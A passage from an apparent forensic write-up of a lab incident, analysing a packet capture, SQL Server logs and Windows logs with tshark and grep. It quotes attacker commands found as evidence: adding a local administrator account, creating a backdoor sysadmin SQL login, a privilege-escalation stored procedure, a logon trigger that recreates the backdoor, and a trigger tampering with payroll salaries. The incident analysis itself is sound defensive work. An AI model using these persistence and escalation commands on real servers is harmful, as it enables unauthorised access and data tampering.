style="white-space: normal;"><span style="white-space: pre;"> </span>"whoami"</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>"net user NewUser NewPassword /add &amp;&amp; net localgroup Administrators NewUser /add"</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Create a new user "NewUser" with password "NewPassword" and add the suer to the "Administrators" group.</span></div><div><span style="white-space: pre;"> </span></div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; CREATE LOGIN MailManSQL WITH PASSWORD = L4rg3j4mb4l4y4s0up!!!; REVERT;</i></div><div>Comment: Create a user "MailManSQL" with password "L4rg3j4mb4l4y4s0up!!!" on the database</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_addsrvrolemember MailManSQL, sysadmin; REVERT;</i></div><div>Comment: Add the newly created user "MailManSQL" to the "sysadmin" group</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query $Query</i></div><div>Comment: Is this meant to clear any historical information in the $Query variable?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; ENABLE TRIGGER MasterOfMySQL ON ALL SERVER; REVERT;</i></div><div>Comment: Enable a database trigger to run on all servers.</div><div>Where was the trigger created? Did I miss this?</div><div>At this point, it looks like the trigger does nothing other than run on all servers?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query $Query</i></div><div>Comment: Is this meant to clear any historical information in the $Query variable?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure xp_cmdshell, 0; RECONFIGURE; REVERT;</i></div><div>Comment: Disable the "xp_cmdshell"</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure show advanced options, 0; RECONFIGURE; REVERT;</i></div><div>Comment: Turn off the "show advanced options"</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Employees; DROP PROCEDURE Going_Up; USE master; REVERT;</i></div><div>Comment: I asked above what is this "Going_Up"? I see now it was a stored procedure. However, I don't see any evidence of it being created previously. Maybe an oversight?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_dropsrvrolemember GeorgeSQL, sysadmin; REVERT;</i></div><div>Comment: Naughty. Removing GeorgeSQL account from the "syadmin" role.</div></div><div><br /></div><div><br /></div><div><div>What do we have for the communication(s) between:</div><div>10.240.240.4 <-> 10.240.240.6 </div><div><br /></div><div>Writing this session out to a file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r packet_capture.pcapng -Y 'ip.addr==10.240.240.4 && ip.addr==10.240.240.6' -w 4-6.pcapng</span>
</pre></div>
</div><div><br /></div><div>Let's look at the protocol hierarchy to see what's there. As you might have noticed, I have done this step quite a few times. It is an important step when doing packet analysis. It should be either the first or the second thing you do once you have received a PCAP.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 4-6.pcapng -q </span><span style="color: #fcff01;"><b>-z io,phs</b></span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:534 bytes:112389</span>
<span style="color: white;"> ip frames:534 bytes:112389</span>
<span style="color: white;"> udp frames:2 bytes:291</span>
<span style="color: white;"> nbns frames:2 bytes:291</span>
<span style="color: white;"> tcp frames:532 bytes:112098</span>
<span style="color: white;"> tds frames:141 bytes:47845</span>
<span style="color: white;"> tcp.segments frames:3 bytes:3716</span>
<span style="color: white;"> _ws.malformed frames:3 bytes:857</span>
<span style="color: white;"> tls frames:91 bytes:34985</span>
<span style="color: white;"> dcerpc frames:16 bytes:4872</span>
<span style="color: white;"> oxid frames:4 bytes:552</span>
<span style="color: white;"> isystemactivator frames:2 bytes:1900</span>
<span style="color: white;"> data frames:64 bytes:3680</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the TCP conversations.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 4-6.pcapng -q </span><b><span style="color: #fcff01;">-z conv,tcp</span></b></span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.4:49685 <-> 10.240.240.6:1433 65 19 kB 90 18 kB 155 37 kB 107.695654000 418.8041</span>
<span style="color: white;">10.240.240.4:49678 <-> 10.240.240.6:1433 51 5,839 bytes 57 11 kB 108 16 kB 26.392676000 480.9564</span>
<span style="color: white;">10.240.240.4:49679 <-> 10.240.240.6:1433 36 2,835 bytes 38 3,416 bytes 74 6,251 bytes 26.411732000 440.0113</span>
<span style="color: white;">10.240.240.4:49675 <-> 10.240.240.6:1433 18 5,774 bytes 31 17 kB 49 23 kB 25.572951000 0.8950</span>
<span style="color: white;">10.240.240.4:49683 <-> 10.240.240.6:1433 23 3,333 bytes 22 5,642 bytes 45 8,975 bytes 27.063125000 0.1133</span>
<span style="color: white;">10.240.240.4:49682 <-> 10.240.240.6:1433 15 2,494 bytes 15 3,900 bytes 30 6,394 bytes 26.936916000 0.1164</span>
<span style="color: white;">10.240.240.4:49676 <-> 10.240.240.6:1433 8 1,566 bytes 10 2,472 bytes 18 4,038 bytes 25.934103000 1.4682</span>
<span style="color: white;">10.240.240.4:49677 <-> 10.240.240.6:1433 7 1,056 bytes 8 1,234 bytes 15 2,290 bytes 26.372522000 0.0392</span>
<span style="color: white;">10.240.240.4:49681 <-> 10.240.240.6:135 6 604 bytes 7 1,876 bytes 13 2,480 bytes 26.480383000 0.0109</span>
<span style="color: white;">10.240.240.4:49684 <-> 10.240.240.6:135 6 604 bytes 7 1,876 bytes 13 2,480 bytes 27.066458000 0.0026</span>
<span style="color: white;">10.240.240.4:49680 <-> 10.240.240.6:135 4 600 bytes 8 632 bytes 12 1,232 bytes 26.475825000 38.3491</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>With 11 sessions, we will analyze these directly rather than writing out to files. </div><div><br /></div><div>Looking at the sessions via following the streams, while showing a lot of SQL related information, did not provide anything I found meaningful to this incident.</div><div><br /></div><div>Here are the commands I ran as seen by my history looking at the streams from 0 to 10.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 2047 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,0 | tr --squeeze-repeats '.' | sed 's/"."//g'</span>
<span style="color: white;"> 2049 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,1 | tr --squeeze-repeats '.' | sed 's/\.//g'</span>
<span style="color: white;"> 2050 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,2 | tr --squeeze-repeats '.' | sed 's/\.//g'</span>
<span style="color: white;"> 2052 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,3 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
<span style="color: white;"> 2054 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,4 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2055 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,5 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2056 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,6 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2062 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,7 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
<span style="color: white;"> 2063 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,8 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
<span style="color: white;"> 2065 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,9 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2067 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,10 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the 7 bytes character strings did not return anything meaningful</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ strings 4-6.pcapng --bytes=7</span>
</pre></div>
</div><div><br /></div><div><div>Considering above, I need to get the Unicode data in a more readable manner. It is better to also search for 16 bits Unicode values. Using a few of the keywords from earlier analysis shows yet still nothing meaningful. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ strings 4-6.pcapng --bytes=7 --encoding=l | grep --perl-regexp --ignore-case "jerry|George|Going|xp_cmd"</span>
<span style="color: white;">JerrySQL</span>
<span style="color: white;">.JerryJERRY-PC</span>
<span style="color: white;">.JerryJERRY-PC</span>
</pre></div>
</div><div><br /></div><div><div>What do we have for the communication(s) between 10.240.240.5 <-> 10.240.240.6 Writing these IPs out to a file:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r packet_capture.pcapng -Y 'ip.addr==10.240.240.5 && ip.addr==10.240.240.6' -w 5-6.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the protocol hierarchy </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-6.pcapng -q </span><span style="color: #fcff01;"><b>-z io,phs</b></span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:482 bytes:36432</span>
<span style="color: white;"> ip frames:482 bytes:36432</span>
<span style="color: white;"> tcp frames:445 bytes:28091</span>
<span style="color: white;"> data frames:2 bytes:308</span>
<span style="color: white;"> nbss frames:9 bytes:1072</span>
<span style="color: white;"> smb frames:2 bytes:444</span>
<span style="color: white;"> tds frames:3 bytes:295</span>
<span style="color: white;"> dcerpc frames:1 bytes:78</span>
<span style="color: white;"> udp frames:7 bytes:2001</span>
<span style="color: white;"> nbns frames:2 bytes:291</span>
<span style="color: white;"> data frames:5 bytes:1710</span>
<span style="color: white;"> icmp frames:30 bytes:6340</span>
<span style="color: white;"> data frames:5 bytes:1850</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the udp coversations this time around first. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 5-6.pcapng -q </span><b><span style="color: #fcff01;">-z conv,udp</span></b></span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">UDP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span><span style="color: white;">10.240.240.5:63161 <-> 10.240.240.6:44558 </span><b><span style="color: #fcff01;"> 0 0 bytes</span></b><span style="color: white;"> </span></span><span style="color: #fcff01;"><b> 5 1,710</b></span><span style="color: white;"> bytes 5 1,710 bytes 12.963807000 </span><span style="color: #fcff01;"><b> 9.2074</b></span>
<span style="color: white;">10.240.240.5:137 <-> 10.240.240.6:137 1 199 bytes 1 92 bytes 2 291 bytes 3.316114000 0.0001</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Taking a look at that first session that lasted 9.2 seconds. This is interesting because all of this traffic is going from 10.240.240.5 on source port 63161 to 10.240.240.6 on destination port 44558. </div><div><br /></div><div>If I did not know better I would say from below this is some type of buffer overflow as we have 5 groups of this.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">===================================================================</span>
<span style="color: white;">Follow: udp,ascii</span>
<span style="color: white;">Filter: udp.stream eq 1</span>
<span style="color: white;">Node 0: 10.240.240.5:63161</span>
<span style="color: white;">Node 1: 10.240.240.6:44558</span>
<span style="color: white;">300</span>
<span style="color: white;">CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>The thing about UDP is that there is no "<i>RST</i>" or "<i>RST/ACK</i>" to say the service is not available. </div><div><br /></div><div>Taking a different approach.</div><div><br /></div><div>What are those ICMP messages about. Looking at the types and code</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 5-6.pcapng </span><b><span style="color: #fcff01;">-Y 'icmp'</span></b><span style="color: white;"> -T fields -e icmp.type -e icmp.code -E header=y | sort | uniq --count</span></span>
<span style="color: white;"> 10 0 0</span>
<span style="color: white;"> 5 3,0 2,0</span>
<span style="color: white;"> 5 3 3</span>
<span style="color: white;"> 5 8 0</span>
<span style="color: white;"> 5 8 9</span>
<span style="color: white;"> 1 icmp.type icmp.code</span>
</pre></div>
</div><div><br /></div><div><div>Nothing there that I would like to spend more time on.</div><div><br /></div><div>Looking at a few of these TCP sessions</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-6.pcapng -q </span><span style="color: #fcff01;"><b>-z conv,tcp</b></span><span style="color: white;"> | head --lines=17 </span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.5:49688 <-> 10.240.240.6:1433 4 265 bytes 6 412 bytes 10 677 bytes 7.214215000 5.0061</span>
<span style="color: white;">10.240.240.5:63129 <-> 10.240.240.6:135 5 270 bytes 5 370 bytes 10 640 bytes 13.029264000 9.2059</span>
<span style="color: white;">10.240.240.5:63131 <-> 10.240.240.6:135 5 270 bytes 5 370 bytes 10 640 bytes 13.100832000 9.1961</span>
<span style="color: white;">10.240.240.5:63133 <-> 10.240.240.6:7 5 270 bytes 5 370 bytes 10 640 bytes 13.171012000 9.1910</span>
<span style="color: white;">10.240.240.5:63134 <-> 10.240.240.6:7 5 270 bytes 5 370 bytes 10 640 bytes 13.204561000 9.1886</span>
<span style="color: white;">10.240.240.5:49684 <-> 10.240.240.6:135 4 252 bytes 5 468 bytes 9 720 bytes 7.211647000 0.0052</span>
<span style="color: white;">10.240.240.5:49678 <-> 10.240.240.6:135 3 174 bytes 5 332 bytes 8 506 bytes 1.190920000 6.0206</span>
<span style="color: white;">10.240.240.5:49679 <-> 10.240.240.6:139 3 179 bytes 5 318 bytes 8 497 bytes 1.191149000 6.0226</span>
<span style="color: white;">10.240.240.5:49681 <-> 10.240.240.6:1433 3 174 bytes 5 344 bytes 8 518 bytes 1.191463000 6.0224</span>
<span style="color: white;">10.240.240.5:49687 <-> 10.240.240.6:139 3 179 bytes 5 468 bytes 8 647 bytes 7.213755000 0.0037</span>
<span style="color: white;">10.240.240.5:49680 <-> 10.240.240.6:445 2 120 bytes 3 348 bytes 5 468 bytes 1.191310000 6.0177</span>
<span style="color: white;">10.240.240.5:49685 <-> 10.240.240.6:445 2 120 bytes 3 186 bytes 5 306 bytes 7.213397000 0.0024</span>
</pre></div>
</div><div><br /></div><div><div>Reviewing all 60 sessions in this file suggest there is mostly traffic related to some type of SYN scan</div></div><div><br /></div><div><div><br /></div><div><b><span style="font-size: large;">Log Analysis - SQL Logs</span></b></div></div><div><br /></div><div><div>How many events to we have in this log file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ cat sql_logs.csv | </span><b><span style="color: #fcff01;">wc --lines</span></b></span>
<span style="color: white;">45</span>
</pre></div>
</div><div><br /></div><div><div>During the packet analysis, I did not notice the procedure "<i>Going_Up</i>" being created. I can now see this in the log for both its creation usage and deletion at lines 21, 23 and 41 respectively.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat sql_logs.csv --number | grep --ignore-case --perl-regexp 'going'</span>
<span style="color: white;"> 21 "sql_batch_completed","2023-07-23 19:16:08.3418567","2023-07-23 19:16:08.3418567","0","10215","0","39","93","11","0","0","OK","</span><span style="color: #fcff01;"><b>CREATE PROCEDURE Going_Up</b></span><span style="color: white;"> WITH EXECUTE AS OWNER AS BEGIN DECLARE @SQL NVARCHAR(MAX); SET @SQL = N' EXEC sp_addsrvrolemember ''GeorgeSQL'', ''sysadmin'''; EXEC sp_executesql @SQL; REVERT; END; ","GeorgeSQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","GeorgeSQL","MSSQL-SR","Seinfeld_Employees","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:16:08.4291040"</span>
</pre></div>
</div><div><br /></div><div><div>Comment: This looks like a store procedure is created using the current security context of the database owner. Looks like <i>GeorgeSQL </i>account is being added to the "<i>sysadmin</i>" group.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">23 "sql_batch_completed","2023-07-23 19:16:18.3869066","2023-07-23 19:16:18.3869066","0","12751","0","29","375","3","0","10","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; USE Seinfeld_Employees; SELECT IS_SRVROLEMEMBER('sysadmin') as isSysadmin; EXEC Going_Up; SELECT IS_SRVROLEMEMBER('sysadmin') as isSysadmin; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:16:18.5402140"</span>
</pre></div>
</div><div><br /></div><div><div>Comment: The previously created stored procedure is being used. The Seinfeld_Employees database being selected and tests are being done to see if the account is a "<i>syadmin</i>"</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">41 "sql_batch_completed","2023-07-23 19:20:03.0824037","2023-07-23 19:20:03.0824037","0","7565","0","136","205","8","0","0","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; USE Seinfeld_Employees; </span><b><span style="color: #fcff01;">DROP PROCEDURE Going_Up</span></b><span style="color: white;">; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:20:02.3085744"</span></span>
</pre></div>
</div><div><br /></div><div><div>Comment: The stored procedure is being destroyed.</div><div><br /></div><div>Similarly for the triggers, I was not able initially, to find information via Packet Analysis, we now see that information here.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat sql_logs.csv --number | grep --ignore-case --perl-regexp 'trigger' </span>
<span style="color: white;"> 35 "sql_batch_completed","2023-07-23 19:18:50.6740293","2023-07-23 19:18:50.6740293","15000","8819","0","88","552","6","0","1","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; DECLARE @SQL NVARCHAR(MAX); SET @SQL = N' </span><span style="color: #fcff01;"><b>CREATE TRIGGER MasterOfMySQL </b></span><span style="color: white;">ON ALL SERVER WITH EXECUTE AS ''sa'' AFTER LOGON AS BEGIN IF ORIGINAL_LOGIN() = ''JerrySQL'' BEGIN IF NOT EXISTS (SELECT 1 FROM sys.server_principals WHERE name = ''MailManSQL'') BEGIN CREATE LOGIN MailManSQL WITH PASSWORD = ''L4rg3j4mb4l4y4s0up!!!''; END END END;'; EXEC sp_executesql @SQL; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:18:51.7700571"</span>
</pre></div>
</div><div><br /></div><div>Comment: Using <i>GeorgeSQL </i>account create a trigger named <i>MasterOfMySQL </i>on all servers. This looks to be creating the <i>MailManSQL </i>account on the database server if it does not exist.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 36 "sql_batch_completed","2023-07-23 19:19:02.1382526","2023-07-23 19:19:02.1382526","0","975","0","0","2","0","0","0","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; </span><span style="color: #fcff01;"><b>ENABLE TRIGGER MasterOfMySQL</b></span><span style="color: white;"> ON ALL SERVER; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:19:02.5253289"</span>
</pre></div>
</div><div><br /></div><div><div>Comment: The Trigger is being enabled</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 38 "sql_batch_completed","2023-07-23 19:19:45.1361731","2023-07-23 19:19:45.1361731","0","8129","0","136","213","11","0","1","OK"," DECLARE @SqlScript NVARCHAR(MAX); SET @SqlScript = N' </span><b><span style="color: #fcff01;">CREATE OR ALTER TRIGGER NoLowSalaryForYou</span></b><span style="color: white;"> ON Payroll AFTER UPDATE AS BEGIN DECLARE @Threshold DECIMAL(10, 2) = 123456; DECLARE @ID INT = 5; IF UPDATE(Salary) BEGIN UPDATE a SET Salary = CASE WHEN b.Salary < @Threshold THEN @Threshold ELSE b.Salary END FROM Payroll a JOIN inserted b ON a.id = b.id WHERE a.id = @ID; END END;'; EXEC sp_executesql @SqlScript; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:19:44.6864483"</span></span>
</pre></div>
</div><div><br /></div><div><div>Comment: Looks to be creating a trigger if it does not exist but altering if it does exist. Looks like this will trigger after an <i>UPDATE </i>is made to the Payroll table. Looks to be setting the salary at 123456.</div></div><div><br /></div><div><br /></div><div><div><span style="font-size: large;"><b>Log Analysis - Windows Logs</b></span></div></div><div><br /></div><div><div>While I am not aware of its importance at this time, I do find<i> la57setup.exe</i> within the 10-240-240-4-<i>events.csv log</i> file as an interesting file based on the name. Searching my system to see if such a file is by default on Win 10:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">C:\users\securitynik></span><b><span style="color: #fcff01;">ver</span></b><span style="color: white;">
Microsoft Windows [</span><span style="color: #fcff01;"><b>Version 10.0.19044.332</b></span><span style="color: white;">4]</span>
</pre></div></div><div><br /></div></div><div>The search did not produce any results<br /><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">C:\users\securitynik></span><span style="color: #fcff01;"><b>dir /S c:\la57setup.exe</b></span><span style="color: white;">
Volume in drive C has no label.
Volume Serial Number is 728F-A8BE
</span><b><span style="color: #fcff01;">File Not Found</span></b>
</pre></div></div><div><br /></div></div><div>Starting off with the device at <i>10.24.240.5</i> now recognized as "<i>NEWMAN-PC</i>"</div><div><br /></div><div>Sorting the Windows logs in the Windows Event Viewer by "<i>Date and Time</i>", having the earlier events at the top and the more recent ones at the bottom.</div><div><br /></div><div>Scrolling through the logs we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">SetValue</span>
<span style="color: white;">2023-07-23 23:09:13.679</span>
<span style="color: white;">EV_RenderedValue_3.00</span>
<span style="color: white;">848</span>
<span style="color: white;">C:\Windows\system32\LogonUI.exe</span>
